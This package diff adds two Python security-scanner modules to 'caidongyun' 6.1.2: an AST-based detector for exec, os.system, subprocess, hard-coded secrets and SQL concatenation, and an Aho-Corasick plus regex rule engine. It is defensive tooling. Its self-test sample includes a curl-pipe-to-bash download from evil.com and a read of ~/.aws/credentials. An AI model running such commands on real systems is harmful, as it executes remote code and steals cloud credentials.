caidongyun 6.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,290 @@
1
+ #!/usr/bin/env python3
2
+ """
3
+ AST 引擎 - 基于 Python AST 的深度检测
4
+ """
5
+
6
+ import ast
7
+ import re
8
+ from typing import List, Dict, Optional, Tuple
9
+ from dataclasses import dataclass
10
+ from pathlib import Path
11
+
12
+
13
@dataclass
class ASTHit:
    """A single finding reported by :class:`ASTEngine`."""

    rule_id: str  # identifier of the rule that fired, e.g. 'AST-EXEC-001'
    line: int  # line number of the offending node (0 when the node has none)
    column: int  # column offset of the offending node (0 when the node has none)
    severity: str  # CRITICAL, HIGH, MEDIUM, LOW
    message: str  # description copied from the rule
    code_snippet: str  # stripped source line, truncated to 100 characters


class ASTEngine:
    """Rule-driven checker that walks a Python AST and reports risky constructs."""

    # Maps operator symbols used in rule definitions to ``ast`` operator class names.
    _OPERATOR_NODE_NAMES = {'%': 'Mod', '+': 'Add'}

    def __init__(self):
        self.rules = self.load_rules()

    def load_rules(self) -> List[Dict]:
        """Return the built-in rule table.

        Every rule has an ``id``, ``severity``, ``message`` and a ``check``
        kind (``call``, ``import``, ``assign`` or ``binop``) that selects the
        ``check_*`` method which evaluates it.
        """
        return [
            # === Code execution ===
            {
                'id': 'AST-EXEC-001',
                'name': 'exec_call',
                'check': 'call',
                'func_names': ['exec'],
                'severity': 'CRITICAL',
                'message': '使用 exec() 可能导致代码注入'
            },
            {
                'id': 'AST-EVAL-001',
                'name': 'eval_call',
                'check': 'call',
                'func_names': ['eval'],
                'severity': 'CRITICAL',
                'message': '使用 eval() 可能导致代码注入'
            },
            {
                'id': 'AST-COMPILE-001',
                'name': 'compile_call',
                'check': 'call',
                'func_names': ['compile'],
                'severity': 'HIGH',
                'message': '使用 compile() 可能动态生成代码'
            },

            # === Shell injection ===
            {
                'id': 'AST-SYSTEM-001',
                'name': 'os_system_call',
                'check': 'call',
                'attr_names': ['system'],
                'module': 'os',
                'severity': 'CRITICAL',
                'message': 'os.system() 可能导致 shell 注入'
            },
            {
                'id': 'AST-SUBPROCESS-001',
                'name': 'subprocess_call',
                'check': 'call',
                'attr_names': ['call', 'run', 'Popen', 'check_output', 'check_call'],
                'module': 'subprocess',
                'severity': 'HIGH',
                'message': 'subprocess 调用可能执行系统命令'
            },

            # === Dangerous imports ===
            {
                'id': 'AST-IMPORT-001',
                'name': 'dangerous_import',
                'check': 'import',
                'modules': ['os', 'sys', 'subprocess', 'socket', 'ctypes'],
                'severity': 'LOW',
                'message': '导入危险模块'
            },

            # === Hard-coded credentials ===
            {
                'id': 'AST-PASSWORD-001',
                'name': 'hardcoded_password',
                'check': 'assign',
                'keywords': ['password', 'passwd', 'pwd', 'secret', 'api_key', 'token'],
                'severity': 'HIGH',
                'message': '可能包含硬编码凭据'
            },

            # === SQL injection ===
            {
                'id': 'AST-SQL-001',
                'name': 'sql_string_format',
                'check': 'binop',
                'operators': ['%', '+'],
                'keywords': ['SELECT', 'INSERT', 'UPDATE', 'DELETE', 'FROM', 'WHERE'],
                'severity': 'CRITICAL',
                'message': 'SQL 语句字符串拼接可能导致注入'
            },
        ]

    def scan(self, file_path: str, content: str) -> List[ASTHit]:
        """Parse *content* and return every rule hit found in it.

        Args:
            file_path: Name of the file being scanned; used only for parser
                diagnostics and log messages.
            content: Python source text.

        Returns:
            The hits in AST traversal order. An empty list is returned when
            the source cannot be parsed or the traversal fails; scanning is
            best-effort and never raises.
        """
        import logging  # function-scope import, matching the file's local-import style

        try:
            tree = ast.parse(content, filename=str(file_path) if file_path else '<unknown>')

            hits: List[ASTHit] = []
            for node in ast.walk(tree):
                if isinstance(node, ast.Call):
                    hits.extend(self.check_call(node, content))
                elif isinstance(node, ast.Import):
                    hits.extend(self.check_import(node, content))
                elif isinstance(node, ast.ImportFrom):
                    hits.extend(self.check_import_from(node, content))
                elif isinstance(node, ast.Assign):
                    hits.extend(self.check_assign(node, content))
                elif isinstance(node, ast.BinOp):
                    hits.extend(self.check_binop(node, content))
            return hits

        except SyntaxError:
            # Not valid Python: nothing to analyse.
            return []
        except Exception as exc:
            # Keep the scan best-effort, but leave a trace instead of failing silently.
            logging.getLogger(__name__).warning(
                "AST scan of %s failed: %s", file_path, exc
            )
            return []

    def check_call(self, node: ast.Call, content: str) -> List[ASTHit]:
        """Match a call node against the ``call`` rules.

        Bare-name calls are compared with ``func_names``; attribute calls of
        the form ``module.attr(...)`` are compared with ``attr_names`` and
        ``module``.
        """
        hits = []
        func = node.func

        for rule in self.rules:
            if rule['check'] != 'call':
                continue

            if isinstance(func, ast.Name):
                if func.id in rule.get('func_names', []):
                    hits.append(self.create_hit(rule, node, content))
            elif isinstance(func, ast.Attribute):
                if (
                    func.attr in rule.get('attr_names', [])
                    and isinstance(func.value, ast.Name)
                    and func.value.id == rule.get('module', '')
                ):
                    hits.append(self.create_hit(rule, node, content))

        return hits

    def check_import(self, node: ast.Import, content: str = '') -> List[ASTHit]:
        """Match ``import x`` statements against the ``import`` rules.

        The top-level package decides the match, so ``import os.path`` is
        reported for the ``os`` rule. *content* is optional and only used to
        fill in the code snippet.
        """
        hits = []

        for rule in self.rules:
            if rule['check'] != 'import':
                continue

            modules = rule.get('modules', [])
            for alias in node.names:
                if alias.name.split('.')[0] in modules:
                    hits.append(self.create_hit(rule, node, content))

        return hits

    def check_import_from(self, node: ast.ImportFrom, content: str = '') -> List[ASTHit]:
        """Match ``from x import y`` statements against the ``import`` rules.

        Relative imports (``from . import x``, ``from .os import x``) refer to
        project-local modules and are ignored. *content* is optional and only
        used to fill in the code snippet.
        """
        hits = []

        # node.module is None for "from . import x"; level > 0 marks a relative import.
        if node.level or not node.module:
            return hits
        top_level = node.module.split('.')[0]

        for rule in self.rules:
            if rule['check'] != 'import':
                continue
            if top_level in rule.get('modules', []):
                hits.append(self.create_hit(rule, node, content))

        return hits

    def check_assign(self, node: ast.Assign, content: str) -> List[ASTHit]:
        """Flag string constants assigned to credential-looking variable names.

        At most one hit is produced per rule and assignment, even when the
        variable name contains several keywords (e.g. ``secret_token``).
        """
        hits = []

        value = node.value
        if not (isinstance(value, ast.Constant) and isinstance(value.value, str)):
            return hits

        target_names = [
            target.id.lower() for target in node.targets if isinstance(target, ast.Name)
        ]

        for rule in self.rules:
            if rule['check'] != 'assign':
                continue

            keywords = rule.get('keywords', [])
            if any(keyword in name for name in target_names for keyword in keywords):
                hits.append(self.create_hit(rule, node, content))

        return hits

    def check_binop(self, node: ast.BinOp, content: str) -> List[ASTHit]:
        """Flag string literals containing SQL keywords that are combined via ``%`` or ``+``.

        Only string literals that are direct operands of *node* are inspected,
        and keywords must match as whole words (case-insensitively). This
        avoids reporting arithmetic on identifiers such as ``from_count`` and
        avoids reporting the same literal once per level of a chained
        concatenation.
        """
        hits = []
        op_name = type(node.op).__name__
        literal_text = None  # computed lazily, at most once per node

        for rule in self.rules:
            if rule['check'] != 'binop':
                continue

            allowed_ops = {
                self._OPERATOR_NODE_NAMES.get(symbol, symbol)
                for symbol in rule.get('operators', ['%', '+'])
            }
            if op_name not in allowed_ops:
                continue

            if literal_text is None:
                literal_text = self._operand_literal_text(node)
            if not literal_text:
                continue

            for keyword in rule.get('keywords', []):
                if re.search(r'\b' + re.escape(keyword) + r'\b', literal_text, re.IGNORECASE):
                    hits.append(self.create_hit(rule, node, content))
                    break

        return hits

    @staticmethod
    def _operand_literal_text(node: ast.BinOp) -> str:
        """Return the literal string text of the direct operands of *node*."""
        fragments = []
        for operand in (node.left, node.right):
            if isinstance(operand, ast.Constant) and isinstance(operand.value, str):
                fragments.append(operand.value)
            elif isinstance(operand, ast.JoinedStr):
                # f-string: keep only its literal parts.
                fragments.extend(
                    part.value for part in operand.values
                    if isinstance(part, ast.Constant) and isinstance(part.value, str)
                )
        return '\n'.join(fragments)

    def create_hit(self, rule: Dict, node: ast.AST, content: str) -> ASTHit:
        """Build an :class:`ASTHit` for *rule* at the position of *node*.

        When *content* is non-empty and the node carries a valid line number,
        the stripped source line (at most 100 characters) is attached as the
        snippet; otherwise the snippet is empty.
        """
        code_snippet = ''
        lineno = getattr(node, 'lineno', 0)
        if content and lineno >= 1:
            lines = content.split('\n')
            if lineno <= len(lines):
                code_snippet = lines[lineno - 1].strip()[:100]

        return ASTHit(
            rule_id=rule['id'],
            line=lineno,
            column=getattr(node, 'col_offset', 0),
            severity=rule['severity'],
            message=rule['message'],
            code_snippet=code_snippet
        )

    def scan_file(self, file_path: str) -> List[ASTHit]:
        """Read *file_path* as UTF-8 and scan it.

        Returns an empty list when the file cannot be opened or decoded.
        """
        try:
            with open(file_path, 'r', encoding='utf-8') as f:
                content = f.read()
        except (OSError, ValueError, TypeError):
            # Missing/unreadable file, undecodable bytes, or an unusable path value.
            return []
        return self.scan(file_path, content)
267
+
268
+
269
# Self-test: scan a small sample when the module is run as a script.
if __name__ == '__main__':
    # Sample source that exercises the import, credential, call and SQL rules.
    sample_source = """
import os
import subprocess

password = "secret123"
exec(user_input)
os.system("ls -la")
subprocess.call(["echo", "hello"])

query = "SELECT * FROM users WHERE id=" + user_id
"""

    findings = ASTEngine().scan("test.py", sample_source)

    print(f"检测到 {len(findings)} 个问题:")
    for finding in findings:
        print(f" {finding.rule_id} [{finding.severity}] 行{finding.line}: {finding.message}")
@@ -0,0 +1,284 @@
1
+ #!/usr/bin/env python3
2
+ """
3
+ 混合扫描器 - Aho-Corasick 预筛选 + Regex 精匹配
4
+
5
+ 架构:
6
+ 1. Aho-Corasick 自动机快速预筛选(0.5ms)
7
+ - 提取所有规则的关键词
8
+ - 一次遍历匹配所有关键词
9
+ - 返回候选攻击类型
10
+
11
+ 2. Regex 引擎精匹配(2ms)
12
+ - 只匹配候选攻击类型的规则
13
+ - 保持 100% 检测精度
14
+ """
15
+
16
+ import ahocorasick
17
+ import re
18
+ import time
19
+ from typing import Dict, List, Set, Tuple
20
+ from pathlib import Path
21
+
22
+
23
class HybridRuleEngine:
    """
    Two-stage rule engine: Aho-Corasick keyword prefilter + regex confirmation.

    The prefilter selects candidate categories from literal keywords taken
    out of each rule's regex patterns; only rules in candidate categories are
    then evaluated with their full regular expressions.

    NOTE(review): keyword extraction is heuristic. A keyword that sits inside
    an optional group or in only one branch of an alternation is not
    guaranteed to appear in every match, so the prefilter can still miss such
    patterns.
    """

    # Words too common in source code to be useful prefilter keywords.
    _COMMON_WORDS = frozenset(
        {'the', 'and', 'for', 'not', 'with', 'from', 'import', 'def', 'return'}
    )
    # Backslash escapes (\b, \s, \., \x41, ...) must not leak letters into keywords.
    _ESCAPE_RE = re.compile(
        r'\\(?:x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|U[0-9a-fA-F]{8}|N\{[^}]*\}|[0-7]{1,3}|.)',
        re.DOTALL,
    )
    # Character classes such as [abc] or [^a-z].
    _CHAR_CLASS_RE = re.compile(r'\[\^?\]?[^\]]*\]')
    # Group syntax carrying letters: (?P<name>, (?P=name), (?i), (?im:
    _GROUP_SYNTAX_RE = re.compile(r'\(\?(?:P<\w+>|P=\w+\)|[aiLmsux-]+[:)])')
    # Brace quantifiers such as {3}, {2,}, {1,5}.
    _BRACE_QUANT_RE = re.compile(r'\{\d*(?:,\d*)?\}')
    _WORD_RE = re.compile(r'[a-zA-Z0-9_]+')

    def __init__(self, rules_file: Path):
        """
        Load the rules and build the prefilter structures.

        Args:
            rules_file: Path to the rule file (JSON).
        """
        self.rules_file = rules_file
        self.rules = []
        self.rules_by_category = {}
        self.automaton = None
        self.keywords = set()
        # Categories owning a pattern with no usable keyword; always scanned.
        self._always_candidates = set()
        # pattern string -> compiled regex, or None when the pattern is invalid.
        self._compiled_patterns = {}

        self._load_rules()
        self._build_automaton()
        self._group_rules_by_category()

    def _load_rules(self):
        """Read ``self.rules_file`` and store the list found under its ``rules`` key."""
        import json

        with open(self.rules_file, 'r', encoding='utf-8') as f:
            data = json.load(f)

        self.rules = data.get('rules', [])
        print(f"✅ 加载 {len(self.rules)} 条规则")

    def _extract_keywords(self, pattern: str) -> List[str]:
        """
        Extract literal keywords from a regex pattern.

        Escape sequences, character classes and group syntax are removed
        first, so ``r'\\bcurl\\b'`` yields ``curl`` rather than ``bcurl``. A
        word directly followed by ``?``, ``*`` or a brace quantifier loses its
        last character, because that character is optional or repeated
        (``https?`` yields ``http``).

        Args:
            pattern: Regular expression source.

        Returns:
            Words of at least three characters, in pattern order, excluding
            common words. Example: ``r'curl\\s+\\|.*bash'`` -> ``['curl', 'bash']``.
        """
        text = self._ESCAPE_RE.sub(' ', pattern)
        text = self._CHAR_CLASS_RE.sub(' ', text)
        text = self._GROUP_SYNTAX_RE.sub(' ', text)
        # Collapse brace quantifiers to '*' so one check below covers them all.
        text = self._BRACE_QUANT_RE.sub('*', text)

        keywords = []
        for found in self._WORD_RE.finditer(text):
            word = found.group(0)
            if text[found.end():found.end() + 1] in ('?', '*'):
                # The quantifier binds to the last character only.
                word = word[:-1]
            if len(word) >= 3 and word.lower() not in self._COMMON_WORDS:
                keywords.append(word)

        return keywords

    def _build_automaton(self):
        """Build the Aho-Corasick automaton mapping keywords to rule categories.

        Each distinct lower-cased keyword is stored once with the tuple of
        all categories that use it; adding the same word repeatedly would
        keep only the last value. Categories that own a pattern without any
        usable keyword are recorded as always-candidates so the prefilter
        cannot hide them.
        """
        print("🔧 构建 Aho-Corasick 自动机...")
        start = time.time()

        categories_by_keyword = {}
        self._always_candidates = set()

        for rule in self.rules:
            category = rule.get('category', 'unknown')

            for pattern in rule.get('patterns', []):
                keywords = self._extract_keywords(pattern)
                if not keywords:
                    self._always_candidates.add(category)
                    continue

                for keyword in keywords:
                    categories_by_keyword.setdefault(keyword.lower(), set()).add(category)

        self.automaton = ahocorasick.Automaton()
        for keyword, categories in categories_by_keyword.items():
            self.automaton.add_word(keyword, tuple(sorted(categories, key=str)))
        self.keywords = set(categories_by_keyword)

        # An automaton without words cannot be finalised or iterated.
        if categories_by_keyword:
            self.automaton.make_automaton()

        elapsed = (time.time() - start) * 1000
        print(f"✅ 自动机构建完成 ({elapsed:.1f}ms)")
        print(f" 关键词数:{len(self.keywords)}")
        print(f" 自动机大小:{len(self.automaton)}")

    def _group_rules_by_category(self):
        """Index ``self.rules`` by their ``category`` (default ``'unknown'``)."""
        self.rules_by_category = {}

        for rule in self.rules:
            category = rule.get('category', 'unknown')
            self.rules_by_category.setdefault(category, []).append(rule)

        print(f"✅ 规则分组完成 ({len(self.rules_by_category)} 个类别)")

    def scan(self, content: str) -> Dict:
        """
        Scan *content* with the prefilter followed by regex confirmation.

        Args:
            content: Text to scan.

        Returns:
            Dict with ``hit_count``, ``matches`` (list of match dicts),
            ``candidate_categories`` (sorted list) and ``scan_time_ms``.
        """
        start = time.time()

        # Step 1: cheap keyword prefilter.
        candidate_categories = self._prefilter(content)

        # Step 2: full regex matching, restricted to candidate categories.
        matches = self._refine_match(content, candidate_categories)

        elapsed = (time.time() - start) * 1000

        return {
            'hit_count': len(matches),
            'matches': matches,
            'candidate_categories': sorted(candidate_categories, key=str),
            'scan_time_ms': elapsed
        }

    def _prefilter(self, content: str) -> Set[str]:
        """
        Return the categories worth running regexes for.

        Args:
            content: Text to scan.

        Returns:
            Categories with at least one keyword present in *content*
            (case-insensitive), plus the always-candidate categories.
        """
        candidate_categories = set(self._always_candidates)

        # Iterating an automaton that holds no words raises, so skip it.
        if self.automaton is None or len(self.automaton) == 0:
            return candidate_categories

        for _end_idx, categories in self.automaton.iter(content.lower()):
            candidate_categories.update(categories)

        return candidate_categories

    def _compile_pattern(self, pattern: str):
        """Return the cached case-insensitive regex for *pattern*, or None if it is invalid."""
        try:
            return self._compiled_patterns[pattern]
        except KeyError:
            pass

        try:
            compiled = re.compile(pattern, re.IGNORECASE)
        except re.error as exc:
            import logging  # function-scope import, matching the file's local-import style

            # Reported once; the None entry keeps later scans quiet and cheap.
            logging.getLogger(__name__).warning(
                "Skipping invalid rule pattern %r: %s", pattern, exc
            )
            compiled = None

        self._compiled_patterns[pattern] = compiled
        return compiled

    def _refine_match(self, content: str, candidate_categories: Set[str]) -> List[Dict]:
        """
        Run the full regexes of every rule in the candidate categories.

        Args:
            content: Text to scan.
            candidate_categories: Categories selected by the prefilter.

        Returns:
            One dict per matching pattern, with ``rule_id``, ``name``,
            ``category``, ``confidence``, ``severity``, ``pattern`` and
            ``match`` (first 100 characters of the matched text).
            Categories are processed in sorted order so the result is
            deterministic.
        """
        matches = []

        for category in sorted(candidate_categories, key=str):
            for rule in self.rules_by_category.get(category, []):
                rule_id = rule.get('id', 'UNKNOWN')
                name = rule.get('name', 'Unknown Rule')
                confidence = rule.get('confidence', 80)
                severity = rule.get('severity', 'MEDIUM')

                for pattern in rule.get('patterns', []):
                    compiled = self._compile_pattern(pattern)
                    if compiled is None:
                        continue

                    match_obj = compiled.search(content)
                    if match_obj:
                        matches.append({
                            'rule_id': rule_id,
                            'name': name,
                            'category': category,
                            'confidence': confidence,
                            'severity': severity,
                            'pattern': pattern,
                            'match': match_obj.group(0)[:100]  # keep the first 100 characters
                        })

        return matches

    def get_stats(self) -> Dict:
        """Return rule, keyword, automaton and category counts."""
        return {
            'total_rules': len(self.rules),
            'total_keywords': len(self.keywords),
            'automaton_size': len(self.automaton),
            'categories': len(self.rules_by_category)
        }
223
+
224
+
225
def test_hybrid_scanner():
    """Smoke-test the hybrid engine on a small malicious-looking sample.

    Prints the scan result and engine statistics. Returns early, after
    printing a notice, when the rule file is not found.
    """
    separator = "="*60
    print(separator)
    print("混合扫描器测试")
    print(separator)

    rules_file = Path(__file__).parent.parent.parent / 'rules' / 'dist' / 'all_rules.json'
    if not rules_file.exists():
        print(f"❌ 规则文件不存在:{rules_file}")
        return

    engine = HybridRuleEngine(rules_file)

    # Sample input that mimics a supply-chain download and credential theft.
    test_content = """
#!/usr/bin/env python3
import os
import requests

# Supply chain attack
response = requests.get('http://evil.com/malicious.sh')
os.system('curl http://evil.com/backdoor.sh | bash')

# Credential theft
with open('~/.aws/credentials') as f:
    aws_key = f.read()
"""

    print("\n📝 测试内容:")
    print(test_content[:200])
    print("...")

    print("\n🔍 开始扫描...")
    result = engine.scan(test_content)

    print(f"\n📊 扫描结果:")
    print(f" 候选类别:{result['candidate_categories']}")
    print(f" 匹配数:{result['hit_count']}")
    print(f" 耗时:{result['scan_time_ms']:.2f}ms")

    print(f"\n🎯 匹配详情:")
    # Show at most the first ten matches.
    for found in result['matches'][:10]:
        print(f" [{found['severity']}] {found['rule_id']}: {found['name']}")
        print(f" 类别:{found['category']}, 置信度:{found['confidence']}")
        print(f" 匹配:{found['match'][:50]}...")

    stats = engine.get_stats()
    print(f"\n📈 性能统计:")
    print(f" 规则数:{stats['total_rules']}")
    print(f" 关键词数:{stats['total_keywords']}")
    print(f" 自动机大小:{stats['automaton_size']}")
    print(f" 类别数:{stats['categories']}")


if __name__ == '__main__':
    test_hybrid_scanner()